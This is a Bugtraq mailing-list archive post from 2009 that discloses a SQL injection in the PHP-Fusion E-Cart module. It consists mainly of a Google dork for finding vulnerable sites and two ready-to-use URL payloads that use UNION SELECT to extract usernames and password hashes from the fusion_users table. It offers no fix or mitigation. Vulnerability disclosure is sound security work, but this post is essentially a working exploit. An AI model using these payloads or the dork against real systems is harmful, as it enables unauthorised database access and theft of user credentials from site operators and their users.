|
Bugtraq
mailing list archives
PHP-Fusion Mod E-Cart Sql Injection
From: r3d.w0rm () yahoo com
Date: Wed, 7 Jan 2009 04:53:43 -0700
#####################################################################################
#### PHP-Fusion Mod E-Cart Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
# #
#Dork : inurl:/infusions/e_cart #
# #
#####################################################################################
# [Bug] #
# #
#Username :
http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
# #
#Password :
http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
 By Date 
By Thread
Current thread:
- PHP-Fusion Mod E-Cart Sql Injection r3d . w0rm (Jan 07)
|
Intro
